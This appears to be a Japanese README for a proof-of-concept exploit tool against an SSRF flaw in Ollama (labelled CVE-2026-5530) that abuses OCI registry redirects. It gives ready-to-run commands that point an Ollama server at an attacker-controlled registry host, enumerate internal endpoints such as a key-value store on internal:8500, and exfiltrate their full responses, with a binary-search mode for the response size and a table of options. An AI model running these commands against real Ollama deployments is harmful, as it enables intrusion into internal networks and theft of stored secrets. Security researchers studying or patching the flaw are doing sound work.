OCIレジストリリダイレクトを介したOllama SSRF、完全なレスポンス外部送信を伴う。
Writeup: https://davidrochester.com/posts/cve-2026-5530
Ollamaに複数回連絡したが、応答はなかった。
enum、exfil、probeの3つのモードがある。
Ollamaホストから到達可能な内部エンドポイントを検出する。
python3 poc.py targets.txt --registry-host <your-ip>
レスポンスサイズが分かっている場合に、SSRFレスポンスを外部送信する。
python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host <your-ip>
レスポンスサイズを自動的に二分探索し、その後外部送信する。
python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host <your-ip>
target URLまたはURLのファイル(1行に1つ、#はコメント)
-p, --port 不正レジストリのポート(デフォルト: 9999)
--exfil-port 外部送信レジストリのポート(デフォルト: 10000)
--exfil 外部送信モード、--sizeが必要
--probe サイズを二分探索し、その後外部送信
--size Content-Length(--exfilと併用時に必須)
--registry-host Ollamaが到達可能な攻撃者のIP/ホスト名
--ollama Ollama API URL(デフォルト: http://127.0.0.1:11434)